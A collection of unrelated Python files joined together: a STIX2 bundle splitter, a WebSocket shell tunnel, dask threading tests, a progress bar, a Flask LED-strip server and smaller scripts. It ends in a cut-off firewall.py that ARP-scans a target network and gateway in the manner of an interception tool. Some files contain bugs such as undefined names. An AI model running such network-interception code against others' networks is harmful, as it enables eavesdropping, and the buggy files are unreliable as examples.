"content": base64.b64encode(bundle.encode("utf-8")).decode("utf-8"),
"update": update,
}
if work_id is not None:
message["work_id"] = work_id
# Send the message
try:
routing_key = "push_routing_" + self.connector_id
channel.basic_publish(
exchange=self.config["push_exchange"],
routing_key=routing_key,
body=json.dumps(message),
properties=pika.BasicProperties(
delivery_mode=2, # make message persistent
),
)
logging.info("Bundle has been sent")
except (UnroutableError, NackError) as e:
logging.error("Unable to send bundle, retry...%s", e)
self._send_bundle(channel, bundle, **kwargs)
def split_stix2_bundle(self, bundle) -> list:
"""splits a valid stix2 bundle into a list of bundles
:param bundle: valid stix2 bundle
:type bundle:
:raises Exception: if data is not valid JSON
:return: returns a list of bundles
:rtype: list
"""
self.cache_index = {}
self.cache_added = []
try:
bundle_data = json.loads(bundle)
except Exception as e:
raise Exception("File data is not a valid JSON") from e
# validation = validate_parsed_json(bundle_data)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON:' + bundle)
# Index all objects by id
for item in bundle_data["objects"]:
self.cache_index[item["id"]] = item
bundles = []
# Reports must be handled because of object_refs
for item in bundle_data["objects"]:
if item["type"] == "report":
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_report_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Relationships not added in previous reports
for item in bundle_data["objects"]:
if item["type"] == "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_relationship_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Entities not added in previous reports and relationships
for item in bundle_data["objects"]:
if item["type"] != "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_entity_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
return bundles
def stix2_get_embedded_objects(self, item) -> Dict:
"""gets created and marking refs for a stix2 item
:param item: valid stix2 item
:type item:
:return: returns a dict of created_by of object_marking_refs
:rtype: Dict
"""
# Marking definitions
object_marking_refs = []
if "object_marking_refs" in item:
for object_marking_ref in item["object_marking_refs"]:
if object_marking_ref in self.cache_index:
object_marking_refs.append(self.cache_index[object_marking_ref])
# Created by ref
created_by_ref = None
if "created_by_ref" in item and item["created_by_ref"] in self.cache_index:
created_by_ref = self.cache_index[item["created_by_ref"]]
return {
"object_marking_refs": object_marking_refs,
"created_by_ref": created_by_ref,
}
def stix2_get_entity_objects(self, entity) -> list:
"""process a stix2 entity
:param entity: valid stix2 entity
:type entity:
:return: entity objects as list
:rtype: list
"""
items = [entity]
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(entity)
# Add created by ref
if embedded_objects["created_by_ref"] is not None:
items.append(embedded_objects["created_by_ref"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_relationship_objects(self, relationship) -> list:
"""get a list of relations for a stix2 relationship object
:param relationship: valid stix2 relationship
:type relationship:
:return: list of relations objects
:rtype: list
"""
items = [relationship]
# Get source ref
if relationship["source_ref"] in self.cache_index:
items.append(self.cache_index[relationship["source_ref"]])
# Get target ref
if relationship["target_ref"] in self.cache_index:
items.append(self.cache_index[relationship["target_ref"]])
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(relationship)
# Add created by ref
if embedded_objects["created_by"] is not None:
items.append(embedded_objects["created_by"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_report_objects(self, report) -> list:
"""get a list of items for a stix2 report object
:param report: valid stix2 report object
:type report:
:return: list of items for a stix2 report object
:rtype: list
"""
items = [report]
# Add all object refs
for object_ref in report["object_refs"]:
items.append(self.cache_index[object_ref])
for item in items:
if item["type"] == "relationship":
items = items + self.stix2_get_relationship_objects(item)
else:
items = items + self.stix2_get_entity_objects(item)
return items
@staticmethod
def stix2_deduplicate_objects(items) -> list:
"""deduplicate stix2 items
:param items: valid stix2 items
:type items:
:return: de-duplicated list of items
:rtype: list
"""
ids = []
final_items = []
for item in items:
if item["id"] not in ids:
final_items.append(item)
ids.append(item["id"])
return final_items
@staticmethod
def stix2_create_bundle(items) -> Optional[str]:
"""create a stix2 bundle with items
:param items: valid stix2 items
:type items:
:return: JSON of the stix2 bundle
:rtype:
"""
bundle = {
"type": "bundle",
"id": f"bundle--{uuid.uuid4()}",
"spec_version": "2.0",
"objects": items,
}
return json.dumps(bundle)
@staticmethod
def check_max_tlp(tlp: str, max_tlp: str) -> bool:
"""check the allowed TLP levels for a TLP string
:param tlp: string for TLP level to check
:type tlp: str
:param max_tlp: the highest allowed TLP level
:type max_tlp: str
:return: TLP level in allowed TLPs
:rtype: bool
"""
allowed_tlps: Dict[str, List[str]] = {
"TLP:RED": ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER", "TLP:RED"],
"TLP:AMBER": ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER"],
"TLP:GREEN": ["TLP:WHITE", "TLP:GREEN"],
"TLP:WHITE": ["TLP:WHITE"],
}
return tlp in allowed_tlps[max_tlp]
|
tunnel.py
|
"""
tunnel.py will tunnel a TCP connection to the service (typically a shell) with ID equal to
SERVICE_UUID over a WebSocket connection to a Determined master at MASTER_ADDR.
"""
import argparse
import io
import os
import socket
import ssl
import sys
import threading
from typing import Optional
import lomond
from determined_common.api import request
class CustomSSLWebsocketSession(lomond.session.WebsocketSession): # type: ignore
"""
A session class that allows for the TLS verification mode of a WebSocket connection to be
configured.
"""
def __init__(
self, socket: lomond.WebSocket, cert_file: Optional[str], cert_name: Optional[str]
) -> None:
super().__init__(socket)
self.ctx = ssl.create_default_context()
if cert_file == "False":
self.ctx.verify_mode = ssl.CERT_NONE
return
if cert_file is not None:
self.ctx.load_verify_locations(cafile=cert_file)
self.cert_name = cert_name
def _wrap_socket(self, sock: socket.SocketType, host: str) -> socket.SocketType:
return self.ctx.wrap_socket(sock, server_hostname=self.cert_name or host)
def copy_to_websocket(
ws: lomond.WebSocket, f: io.RawIOBase, ready_sem: threading.Semaphore
) -> None:
ready_sem.acquire()
try:
while True:
chunk = f.read(4096)
if not chunk:
break
ws.send_binary(chunk)
finally:
f.close()
ws.close()
def copy_from_websocket(
f: io.RawIOBase,
ws: lomond.WebSocket,
ready_sem: threading.Semaphore,
cert_file: Optional[str],
cert_name: Optional[str],
) -> None:
try:
for event in ws.connect(
ping_rate=0,
session_class=lambda socket: CustomSSLWebsocketSession(socket, cert_file, cert_name),
):
if isinstance(event, lomond.events.Binary):
f.write(event.data)
elif isinstance(event, lomond.events.Ready):
ready_sem.release()
elif isinstance(
event,
(lomond.events.ConnectFail, lomond.events.Rejected, lomond.events.ProtocolError),
):
raise Exception("Connection failed: {}".format(event))
elif isinstance(event, (lomond.events.Closing, lomond.events.Disconnected)):
break
finally:
f.close()
def http_connect_tunnel(
master: str, service: str, cert_file: Optional[str], cert_name: Optional[str]
) -> None:
parsed_master = request.parse_master_address(master)
assert parsed_master.hostname is not None, "Failed to parse master address: {}".format(master)
url = request.make_url(master, "proxy/{}/".format(service))
ws = lomond.WebSocket(request.maybe_upgrade_ws_scheme(url))
# We can't send data to the WebSocket before the connection becomes ready, which takes a bit of
# time; this semaphore lets the sending thread wait for that to happen.
ready_sem = threading.Semaphore(0)
# Directly using sys.stdin.buffer.read or sys.stdout.buffer.write would block due to
# buffering; instead, we use unbuffered file objects based on the same file descriptors.
unbuffered_stdin = os.fdopen(sys.stdin.fileno(), "rb", buffering=0)
unbuffered_stdout = os.fdopen(sys.stdout.fileno(), "wb", buffering=0)
c1 = threading.Thread(target=copy_to_websocket, args=(ws, unbuffered_stdin, ready_sem))
c2 = threading.Thread(
target=copy_from_websocket, args=(unbuffered_stdout, ws, ready_sem, cert_file, cert_name)
)
c1.start()
c2.start()
c1.join()
c2.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Tunnel through a Determined master")
parser.add_argument("master_addr")
parser.add_argument("service_uuid")
parser.add_argument("--cert-file")
parser.add_argument("--cert-name")
args = parser.parse_args()
http_connect_tunnel(args.master_addr, args.service_uuid, args.cert_file, args.cert_name)
|
test_threaded.py
|
import os
import sys
import signal
import threading
from multiprocessing.pool import ThreadPool
from time import time, sleep
import pytest
import dask
from dask.compatibility import PY2
from dask.threaded import get
from dask.utils_test import inc, add
def test_get():
dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}
assert get(dsk, 'w') == 4
assert get(dsk, ['w', 'z']) == (4, 2)
def test_nested_get():
dsk = {'x': 1, 'y': 2, 'a': (add, 'x', 'y'), 'b': (sum, ['x', 'y'])}
assert get(dsk, ['a', 'b']) == (3, 3)
def test_get_without_computation():
dsk = {'x': 1}
assert get(dsk, 'x') == 1
def test_broken_callback():
from dask.callbacks import Callback
def _f_ok(*args, **kwargs):
pass
def _f_broken(*args, **kwargs):
raise ValueError('my_exception')
dsk = {'x': 1}
with Callback(start=_f_broken, finish=_f_ok):
with Callback(start=_f_ok, finish=_f_ok):
with pytest.raises(ValueError, match='my_exception'):
get(dsk, 'x')
def bad(x):
raise ValueError()
def test_exceptions_rise_to_top():
dsk = {'x': 1, 'y': (bad, 'x')}
pytest.raises(ValueError, lambda: get(dsk, 'y'))
def test_reuse_pool():
pool = ThreadPool()
with dask.config.set(pool=pool):
assert get({'x': (inc, 1)}, 'x') == 2
assert get({'x': (inc, 1)}, 'x') == 2
@pytest.mark.skipif(PY2, reason="threading API changed")
def test_pool_kwarg():
def f():
sleep(0.01)
return threading.get_ident()
dsk = {('x', i): (f,) for i in range(30)}
dsk['x'] = (len, (set, [('x', i) for i in range(len(dsk))]))
with ThreadPool(3) as pool:
assert get(dsk, 'x', pool=pool) == 3
def test_threaded_within_thread():
L = []
def f(i):
result = get({'x': (lambda: i,)}, 'x', num_workers=2)
L.append(result)
before = threading.active_count()
for i in range(20):
t = threading.Thread(target=f, args=(1,))
t.daemon = True
t.start()
t.join()
assert L == [1]
del L[:]
start = time() # wait for most threads to join
while threading.active_count() > before + 10:
sleep(0.01)
assert time() < start + 5
def test_dont_spawn_too_many_threads():
before = threading.active_count()
dsk = {('x', i): (lambda: i,) for i in range(10)}
dsk['x'] = (sum, list(dsk))
for i in range(20):
get(dsk, 'x', num_workers=4)
after = threading.active_count()
assert after <= before + 8
def test_thread_safety():
def f(x):
return 1
dsk = {'x': (sleep, 0.05), 'y': (f, 'x')}
L = []
def test_f():
L.append(get(dsk, 'y'))
threads = []
for i in range(20):
t = threading.Thread(target=test_f)
t.daemon = True
t.start()
threads.append(t)
for thread in threads:
thread.join()
assert L == [1] * 20
@pytest.mark.xfail('xdist' in sys.modules,
reason=("This test fails intermittently when using "
"pytest-xdist (maybe)"))
def test_interrupt():
# Python 2 and windows 2 & 3 both implement `queue.get` using polling,
# which means we can set an exception to interrupt the call to `get`.
# Python 3 on other platforms requires sending SIGINT to the main thread.
if PY2:
from thread import interrupt_main
elif os.name == 'nt':
from _thread import interrupt_main
else:
main_thread = threading.get_ident()
def interrupt_main():
signal.pthread_kill(main_thread, signal.SIGINT)
def long_task():
sleep(5)
dsk = {('x', i): (long_task,) for i in range(20)}
dsk['x'] = (len, list(dsk.keys()))
try:
interrupter = threading.Timer(0.5, interrupt_main)
interrupter.start()
start = time()
get(dsk, 'x')
except KeyboardInterrupt:
pass
except Exception:
assert False, "Failed to interrupt"
stop = time()
if stop - start > 4:
assert False, "Failed to interrupt"
|
base.py
|
"""
Progress bar implementation on top of prompt_toolkit.
::
with ProgressBar(...) as pb:
for item in pb(data):
...
"""
import datetime
import functools
import os
import signal
import threading
import traceback
from asyncio import get_event_loop, new_event_loop, set_event_loop
from typing import (
Generic,
Iterable,
List,
Optional,
Sequence,
Sized,
TextIO,
TypeVar,
cast,
)
from prompt_toolkit.application import Application
from prompt_toolkit.application.current import get_app_session
from prompt_toolkit.filters import Condition, is_done, renderer_height_is_known
from prompt_toolkit.formatted_text import (
AnyFormattedText,
StyleAndTextTuples,
to_formatted_text,
)
from prompt_toolkit.input import Input
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.key_processor import KeyPressEvent
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
HSplit,
Layout,
VSplit,
Window,
)
from prompt_toolkit.layout.controls import UIContent, UIControl
from prompt_toolkit.layout.dimension import AnyDimension, D
from prompt_toolkit.output import ColorDepth, Output
from prompt_toolkit.styles import BaseStyle
from prompt_toolkit.utils import in_main_thread
from .formatters import Formatter, create_default_formatters
try:
import contextvars
except ImportError:
from prompt_toolkit.eventloop import dummy_contextvars as contextvars # type: ignore
__all__ = [
"ProgressBar",
]
E = KeyPressEvent
def create_key_bindings() -> KeyBindings:
"""
Key bindings handled by the progress bar.
(The main thread is not supposed to handle any key bindings.)
"""
kb = KeyBindings()
@kb.add("c-l")
def _(event: E) -> None:
event.app.renderer.clear()
@kb.add("c-c")
def _(event: E) -> None:
# Send KeyboardInterrupt to the main thread.
os.kill(os.getpid(), signal.SIGINT)
return kb
_T = TypeVar("_T")
class ProgressBar:
"""
Progress bar context manager.
Usage ::
with ProgressBar(...) as pb:
for item in pb(data):
...
:param title: Text to be displayed above the progress bars. This can be a
callable or formatted text as well.
:param formatters: List of :class:`.Formatter` instances.
:param bottom_toolbar: Text to be displayed in the bottom toolbar. This
can be a callable or formatted text.
:param style: :class:`prompt_toolkit.styles.BaseStyle` instance.
:param key_bindings: :class:`.KeyBindings` instance.
:param file: The file object used for rendering, by default `sys.stderr` is used.
:param color_depth: `prompt_toolkit` `ColorDepth` instance.
:param output: :class:`~prompt_toolkit.output.Output` instance.
:param input: :class:`~prompt_toolkit.input.Input` instance.
"""
def __init__(
self,
title: AnyFormattedText = None,
formatters: Optional[Sequence[Formatter]] = None,
bottom_toolbar: AnyFormattedText = None,
style: Optional[BaseStyle] = None,
key_bindings: Optional[KeyBindings] = None,
file: Optional[TextIO] = None,
color_depth: Optional[ColorDepth] = None,
output: Optional[Output] = None,
input: Optional[Input] = None,
) -> None:
self.title = title
self.formatters = formatters or create_default_formatters()
self.bottom_toolbar = bottom_toolbar
self.counters: List[ProgressBarCounter[object]] = []
self.style = style
self.key_bindings = key_bindings
# Note that we use __stderr__ as default error output, because that
# works best with `patch_stdout`.
self.color_depth = color_depth
self.output = output or get_app_session().output
self.input = input or get_app_session().input
self._thread: Optional[threading.Thread] = None
self._loop = get_event_loop()
self._app_loop = new_event_loop()
self._previous_winch_handler = (
signal.getsignal(signal.SIGWINCH) if hasattr(signal, "SIGWINCH") else None
)
self._has_sigwinch = False
def __enter__(self) -> "ProgressBar":
# Create UI Application.
title_toolbar = ConditionalContainer(
Window(
FormattedTextControl(lambda: self.title),
height=1,
style="class:progressbar,title",
),
filter=Condition(lambda: self.title is not None),
)
bottom_toolbar = ConditionalContainer(
Window(
FormattedTextControl(
lambda: self.bottom_toolbar, style="class:bottom-toolbar.text"
),
style="class:bottom-toolbar",
height=1,
),
filter=~is_done
& renderer_height_is_known
& Condition(lambda: self.bottom_toolbar is not None),
)
def width_for_formatter(formatter: Formatter) -> AnyDimension:
# Needs to be passed as callable (partial) to the 'width'
# parameter, because we want to call it on every resize.
return formatter.get_width(progress_bar=self)
progress_controls = [
Window(
content=_ProgressControl(self, f),
width=functools.partial(width_for_formatter, f),
)
for f in self.formatters
]
self.app: Application[None] = Application(
min_redraw_interval=0.05,
layout=Layout(
HSplit(
[
title_toolbar,
VSplit(
progress_controls,
height=lambda: D(
preferred=len(self.counters), max=len(self.counters)
),
),
Window(),
bottom_toolbar,
]
)
),
style=self.style,
key_bindings=self.key_bindings,
refresh_interval=0.3,
color_depth=self.color_depth,
output=self.output,
input=self.input,
)
# Run application in different thread.
def run() -> None:
set_event_loop(self._app_loop)
try:
self.app.run()
except BaseException as e:
traceback.print_exc()
print(e)
ctx: contextvars.Context = contextvars.copy_context()
self._thread = threading.Thread(target=ctx.run, args=(run,))
self._thread.start()
# Attach WINCH signal handler in main thread.
# (Interrupt that we receive during resize events.)
self._has_sigwinch = hasattr(signal, "SIGWINCH") and in_main_thread()
if self._has_sigwinch:
self._previous_winch_handler = signal.getsignal(signal.SIGWINCH)
self._loop.add_signal_handler(signal.SIGWINCH, self.invalidate)
return self
def __exit__(self, *a: object) -> None:
# Quit UI application.
if self.app.is_running:
self.app.exit()
# Remove WINCH handler.
if self._has_sigwinch:
self._loop.remove_signal_handler(signal.SIGWINCH)
signal.signal(signal.SIGWINCH, self._previous_winch_handler)
if self._thread is not None:
self._thread.join()
self._app_loop.close()
def __call__(
self,
data: Optional[Iterable[_T]] = None,
label: AnyFormattedText = "",
remove_when_done: bool = False,
total: Optional[int] = None,
) -> "ProgressBarCounter[_T]":
"""
Start a new counter.
:param label: Title text or description for this progress. (This can be
formatted text as well).
:param remove_when_done: When `True`, hide this progress bar.
:param total: Specify the maximum value if it can't be calculated by
calling ``len``.
"""
counter = ProgressBarCounter(
self, data, label=label, remove_when_done=remove_when_done, total=total
)
self.counters.append(counter)
return counter
def invalidate(self) -> None:
self._app_loop.call_soon_threadsafe(self.app.invalidate)
class _ProgressControl(UIControl):
"""
User control for the progress bar.
"""
def __init__(self, progress_bar: ProgressBar, formatter: Formatter) -> None:
self.progress_bar = progress_bar
self.formatter = formatter
self._key_bindings = create_key_bindings()
def create_content(self, width: int, height: int) -> UIContent:
items: List[StyleAndTextTuples] = []
for pr in self.progress_bar.counters:
try:
text = self.formatter.format(self.progress_bar, pr, width)
except BaseException:
traceback.print_exc()
text = "ERROR"
items.append(to_formatted_text(text))
def get_line(i: int) -> StyleAndTextTuples:
return items[i]
return UIContent(get_line=get_line, line_count=len(items), show_cursor=False)
def is_focusable(self) -> bool:
return True # Make sure that the key bindings work.
def get_key_bindings(self) -> KeyBindings:
return self._key_bindings
_CounterItem = TypeVar("_CounterItem", covariant=True)
class ProgressBarCounter(Generic[_CounterItem]):
"""
An individual counter (A progress bar can have multiple counters).
"""
def __init__(
self,
progress_bar: ProgressBar,
data: Optional[Iterable[_CounterItem]] = None,
label: AnyFormattedText = "",
remove_when_done: bool = False,
total: Optional[int] = None,
) -> None:
self.start_time = datetime.datetime.now()
self.stop_time: Optional[datetime.datetime] = None
self.progress_bar = progress_bar
self.data = data
self.items_completed = 0
self.label = label
self.remove_when_done = remove_when_done
self._done = False
self.total: Optional[int]
if total is None:
try:
self.total = len(cast(Sized, data))
except TypeError:
self.total = None # We don't know the total length.
else:
self.total = total
def __iter__(self) -> Iterable[_CounterItem]:
try:
if self.data is not None:
for item in self.data:
yield item
self.item_completed()
finally:
self.done = True
def item_completed(self) -> None:
"""
Start handling the next item.
(Can be called manually in case we don't have a collection to loop through.)
"""
self.items_completed += 1
self.progress_bar.invalidate()
@property
def done(self) -> bool:
return self._done
@done.setter
def done(self, value: bool) -> None:
self._done = value
# If done then store the stop_time, otherwise clear.
self.stop_time = datetime.datetime.now() if value else None
if value and self.remove_when_done:
self.progress_bar.counters.remove(self)
@property
def percentage(self) -> float:
if self.total is None:
return 0
else:
return self.items_completed * 100 / max(self.total, 1)
@property
def time_elapsed(self) -> datetime.timedelta:
"""
Return how much time has been elapsed since the start.
"""
if self.stop_time is None:
return datetime.datetime.now() - self.start_time
else:
return self.stop_time - self.start_time
@property
def time_left(self) -> Optional[datetime.timedelta]:
"""
Timedelta representing the time left.
"""
if self.total is None or not self.percentage:
return None
else:
return self.time_elapsed * (100 - self.percentage) / self.percentage
|
server.py
|
import time
import board
import neopixel
import threading
from flask import Flask
# Choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D18
# NeoPixels must be connected to D10, D12, D18 or D21 to work.
pixel_pin = board.D21
# The number of NeoPixels
num_pixels = 137
# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!
# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.
ORDER = neopixel.GRB
pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=1.0, auto_write=False,
pixel_order=ORDER)
app = Flask(__name__)
rgb=(255,255,255)
status = 0
enableRainbow = False
# I'm not entirely sure what to do with the ratio yet. Repeated brightness adjustments cause problems. Maybe max this until >=1 of the component values is 255?
rgbRatio=(255, 255, 255)
brightness = 1
def wheel(pos):
# Input a value 0 to 255 to get a color value.
# The colours are a transition r - g - b - back to r.
global brightness
if pos < 0 or pos > 255:
r = g = b = 0
elif pos < 85:
r = int(pos * 3)
g = int(255 - pos*3)
b = 0
elif pos < 170:
pos -= 85
r = int(255 - pos*3)
g = 0
b = int(pos*3)
else:
pos -= 170
r = 0
g = int(pos*3)
b = int(255 - pos*3)
r, g, b = int(brightness * r), int(brightness * g), int(brightness * b)
return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0)
def rgb_to_hex(rgb):
return '#%02x%02x%02x' % rgb
def hex_to_rgb(value):
"""Return (red, green, blue) for the color given as #rrggbb."""
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
def rainbow_cycle():
global enableRainbow
while enableRainbow:
for j in range(255):
# This is necessary because with longer strands this nested loop just takes foreverrrrrr, so breaking will force a re-eval. It's hacky, and could
# be done more cleanly probably. Consider refactoring in the future to move the thread object to be global, making it stoppable and then implementing
# more consistent checks instead of having random globals flying all over the place. Blame the wine.
if not enableRainbow:
break
for i in range(num_pixels):
pixel_index = (i * 256 // num_pixels) + j
pixels[i] = wheel(pixel_index & 255)
pixels.show()
off()
return
@app.route("/status")
def status():
global status
return str(status)
@app.route("/bright")
def bright():
global rgb
print(str(int(brightness*100)))
return str(int(brightness*100))
@app.route("/color")
def color():
global rgb
value = rgb_to_hex(rgb)
return str(value)
@app.route("/rainbow")
def rainbow():
global enableRainbow
global status
status = 1
global rgb
pixels.fill(rgb)
pixels.show()
if(enableRainbow==False):
enableRainbow=True
t = threading.Thread(target = rainbow_cycle)
t.start()
return "on"
# TODO: Test this actually works. Can this be condensed in to the other /bright route? Is it easier to just have one with no args and one with args?
# TODO: Handle case where brightness is 0.
# More Info on setBrightness() call: https://forums.adafruit.com/viewtopic.php?t=41143
@app.route("/setbright/<value>")
def setbright(value):
global rgb
global brightness
brightness = int(value) / 100
rgb = tuple(int(brightness * v) for v in rgbRatio)
return str(int(brightness*100))
@app.route("/on")
def on():
global status
status = 1
global rgb
pixels.fill(rgb)
pixels.show()
return "on"
@app.route("/off")
def off():
global status
status = 0
global enableRainbow
enableRainbow=False
pixels.fill((0,0,0))
pixels.show()
return "off"
@app.route("/set/<values>")
def set(values):
global enableRainbow
enableRainbow=False
h = values
#h = values.replace("NA","0").replace("N","1")
global rgb
global rgbRatio
#rgb=hex_to_rgb(h)
rgb=tuple(int(h[i:i+2], 16) for i in (0, 2 ,4))
# Figure out which of these is the highest value, and how far it needs to scale to get to 255
rgbRatio = tuple(int(v*255/max(rgb)) for v in rgb)
pixels.fill(rgb)
pixels.show()
return "ok"
|
pygments_style.py
|
"""Display a "Syntax Colors" menu."""
from __future__ import annotations
import threading
import tkinter
from pygments import styles, token
from porcupine import get_main_window, get_tab_manager, menubar, settings, utils
def get_colors(style_name: str) -> tuple[str, str]:
style = styles.get_style_by_name(style_name)
bg = style.background_color
# style_names have a style_for_token() method, but only iterating
# is documented :( http://pygments.org/docs/formatterdevelopment/
# i'm using iter() to make sure that dict() really treats
# the style as an iterable of pairs instead of some other
# metaprogramming fanciness
style_infos = dict(iter(style))
fg = style_infos[token.String]["color"] or style_infos[token.Text]["color"]
if fg:
# style_infos doesn't contain leading '#' for whatever reason
fg = "#" + fg
else:
# do like textutils.use_pygments_theme does
fg = getattr(style, "default_style", "") or utils.invert_color(bg)
return (fg, bg)
# threading this gives a significant speed improvement on startup
# on this system, setup() took 0.287940 seconds before adding threads
# and 0.000371 seconds after adding threads
def load_style_names_to_list(target_list: list[str]) -> None:
target_list.extend(styles.get_all_styles()) # slow
target_list.sort()
def setup() -> None:
style_names: list[str] = []
thread = threading.Thread(target=load_style_names_to_list, args=[style_names])
thread.daemon = True # i don't care wtf happens to this
thread.start()
def check_if_it_finished() -> None:
if thread.is_alive():
get_main_window().after(200, check_if_it_finished)
return
var = tkinter.StringVar(value=settings.get("pygments_style", str))
def settings2var(event: tkinter.Event[tkinter.Misc]) -> None:
var.set(settings.get("pygments_style", str))
def var2settings(*junk: str) -> None:
settings.set_("pygments_style", var.get())
# this doesn't recurse infinitely because <<SettingChanged:bla>>
# gets generated only when the setting actually changes
get_tab_manager().bind("<<SettingChanged:pygments_style>>", settings2var, add=True)
var.trace_add("write", var2settings)
for style_name in style_names:
fg, bg = get_colors(style_name)
menubar.get_menu("Syntax Colors").add_radiobutton(
label=style_name,
value=style_name,
variable=var,
foreground=fg,
background=bg,
# swapped colors
activeforeground=bg,
activebackground=fg,
)
get_main_window().after(200, check_if_it_finished)
|
module2.py
|
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Rajesh
#
# Created: 24-12-2019
# Copyright: (c) Rajesh 2019
# Licence: <your licence>
#-------------------------------------------------------------------------------
import os
import threading
import time
def fun():
time.sleep(3)
print("fin")
def func():
print ("hi")
mine = fun()
return
def main():
my = threading.Thread(target = func)
time.sleep(10)
return
if __name__ == '__main__':
main()
|
deyaml.py
|
"""The Walking Thread"""
import os
import threading, queue
from pathlib import Path
import yaml
import string
kolejka_folder = queue.Queue()
CODE_PATH = "/home/kris/workshops/tools/copypaster/dirtynotes/folders/maps"
DECKS = "decks"
YAML_FILES = (
'.yaml',
'.yml',
)
CLICK_COUNT = "click_count"
INFO = "info"
NAME = "name"
VALUE = "value"
BUTTONS = "buttons"
CATEGORY = "category"
SNIPPET = "snippet"
CONTENT = "content"
INFO = "info"
MAX_FILENAME_LENGTH = 18
join = os.path.join
rules = str.maketrans('', '', string.punctuation)
name_counter = 1
def placeholder_name():
_lock = threading.Lock()
with _lock:
global name_counter
name = f"snippet_{name_counter}"
name_counter += 1
return name
def clean_name(name):
name.strip()
name = name.translate(rules)
if len(name) > MAX_FILENAME_LENGTH:
name = name[:MAX_FILENAME_LENGTH]
if len(name) == 0:
name = placeholder_name()
return name
def read(entry):
if entry.is_file():
return ('file', f"name: {entry.name}", f"path: {entry.path}")
if entry.is_dir():
return ('dir', f"name: {entry.name}", f"path: {entry.path}")
class Snippet:
def __init__(self):
self.name = ""
self.content = ""
@property
def file_name(self):
return self.name.replace(" ", "-")
def populate(self, button):
self.content = str(button.get(VALUE, ""))
self.name = str(button.get(NAME, button.get(VALUE, "")))
self.name = clean_name(self.name)
return self
def load(self, path):
with open(path, 'r') as f:
content = f.readlines()
# f"# name: {self.name}\n"
self.name = content[0][8:].strip()
self.content = "".join(content[1:])
return self
def save(self, path):
with open(join(path, self.file_name), 'w') as f:
f.write(f"# name: {self.name} \n")
f.write(self.content)
return self
class YamlFile:
def __init__(self, file_path):
self.contents = None
self.load(file_path)
def load(self, path):
"""Load file"""
with open(path) as f:
self.contents = yaml.load(f.read(), Loader=yaml.FullLoader)
def transform_into_snippets(self):
for button in self.contents[BUTTONS]:
yield Snippet().populate(button)
def extract_values(entry):
path = Path(entry.path)
yaml_snippets = YamlFile(entry.path)
snippet_folder = path.with_suffix('')
snippet_folder.mkdir(parents=True, exist_ok=True)
snippet_folder = str(snippet_folder)
[snippet.save(snippet_folder) for snippet in yaml_snippets.transform_into_snippets()]
def deyaml(folder):
# TODO: here i selfcan read a file with metadata
with os.scandir(folder) as it:
for entry in it:
if entry.name.startswith('.'):
continue
if entry.is_dir():
kolejka_folder.put(entry.path)
if Path(entry.path).suffix not in YAML_FILES:
continue
extract_values(entry)
def worker():
while True:
folder = kolejka_folder.get()
log.info(f'Working on folder: {folder}')
deyaml(folder)
print(f'Finished {folder}')
kolejka_folder.task_done()
if __name__ == "__main__":
# turn-on the worker thread
threading.Thread(target=worker, daemon=True).start()
kolejka_folder.put(CODE_PATH)
# block until all tasks are done
kolejka_folder.join()
print('All work completed')
|
firewall.py
|
#!/usr/bin/env python3
import netfilterqueue
import scapy.all as scapy
from scapy.layers import http
import argparse
from threading import *
from time import *
import re
connected_clients = []
blocked_websites = []
file_name = re.sub("\s\d\d:\d\d:\d\d", "", asctime())
log_file = open(os.path.abspath(os.getcwd())+"/Logs/"+file_name+".txt", "a")
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", help="Use to specify target IP/IP Range.")
parser.add_argument("-g", "--gateway", dest="gateway_ip", help="Use to specify the gateway IP.")
options = parser.parse_args()
if not options.target:
parser.error("[-] Please specify a target IP/IP Range, use --help for more info.")
if not options.gateway_ip:
parser.error("[-] Please specify the gateway IP, use --help for more info.")
return options
def scan(ip):
global connected_clients
while True:
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip":element[1].psrc , "mac":element[1].hwsrc}
clients_list.append(client_dict)
connected_clients = [] + clients_list
print_scan_result(connected_clients)
print("\rNumber of Connected Clients: ", len(connected_clients))
sleep(120)
def print_scan_result(results_list):
print("IP\t\t\tMAC Address\n-----------------------------------------")
for client in results_list:
print(client["ip"]+"\t\t"+client["mac"])
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
